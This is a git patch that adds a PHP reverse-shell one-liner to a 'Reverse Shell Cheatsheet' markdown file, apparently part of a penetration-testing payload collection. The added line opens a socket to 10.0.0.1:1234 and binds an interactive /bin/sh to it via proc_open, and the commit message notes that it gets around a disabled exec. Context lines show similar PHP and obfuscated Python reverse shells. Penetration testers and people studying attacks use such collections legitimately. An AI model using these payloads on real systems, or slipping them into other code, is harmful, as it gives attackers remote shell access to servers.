From 9c188139eca99b01ea9f82639137a5121035787d Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Gy=C3=B6rgy=20Demarcsek?=
 <gdemarcsek@users.noreply.github.com>
Date: Thu, 2 Jan 2020 19:27:35 +0100
Subject: [PATCH] Added PHP reverse shell

This reverse shell payload for PHP works even if `exec` is disabled and/or the new socket is not on fd 3
---
 Methodology and Resources/Reverse Shell Cheatsheet.md | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md
index 5ccebd6..7c4bf85 100644
--- a/Methodology and Resources/Reverse Shell Cheatsheet.md	
+++ b/Methodology and Resources/Reverse Shell Cheatsheet.md	
@@ -107,6 +107,10 @@ C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('1
 php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
 ```
 
+```bash
+php -r '$sock=fsockopen("10.0.0.1",1234);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'
+```
+
 ### Ruby
 
 ```ruby